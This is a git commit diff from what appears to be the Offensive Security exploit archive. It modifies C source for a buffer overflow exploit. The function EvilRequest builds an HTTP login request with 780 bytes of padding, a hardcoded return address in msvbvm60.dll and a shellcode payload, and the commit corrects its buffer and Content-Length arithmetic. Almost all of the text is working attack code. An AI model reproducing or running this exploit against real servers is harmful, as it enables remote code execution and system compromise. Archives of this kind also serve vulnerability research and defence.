DB: 2018-02-25

1 changes to exploits/shellcodes
This commit is contained in:
Offensive Security 2018-02-25 05:01:49 +00:00
parent 63851395e7
commit 971db1056d

View file

@ -62,9 +62,10 @@ void EvilRequest() {
"Content-Length: ";
char request_two[] = "\r\n\r\nusername=";
char *padding = malloc(780);
memset(padding, 0x41, 780);
memset(padding + 778, 0x00, 2);
int initial_buffer_size = 780;
char *padding = malloc(initial_buffer_size);
memset(padding, 0x41, initial_buffer_size);
memset(padding + initial_buffer_size - 1, 0x00, 1);
unsigned char retn[] = "\xcb\x75\x52\x73"; //ret at msvbvm60.dll
unsigned char shellcode[] =
@ -96,10 +97,10 @@ void EvilRequest() {
char request_three[] = "&password=A";
int buffer_length = strlen(request_one) + 780 + strlen(retn) + strlen(request_two) + strlen(shellcode) + strlen(request_three);
int content_length = 9 + 780 + strlen(retn) + strlen(shellcode) + strlen(request_three);
int content_length = 9 + strlen(padding) + strlen(retn) + strlen(shellcode) + strlen(request_three);
char *content_length_string = malloc(15);
sprintf(content_length_string, "%d", content_length);
int buffer_length = strlen(request_one) + strlen(content_length_string) + initial_buffer_size + strlen(retn) + strlen(request_two) + strlen(shellcode) + strlen(request_three);
char *buffer = malloc(buffer_length);
memset(buffer, 0x00, buffer_length);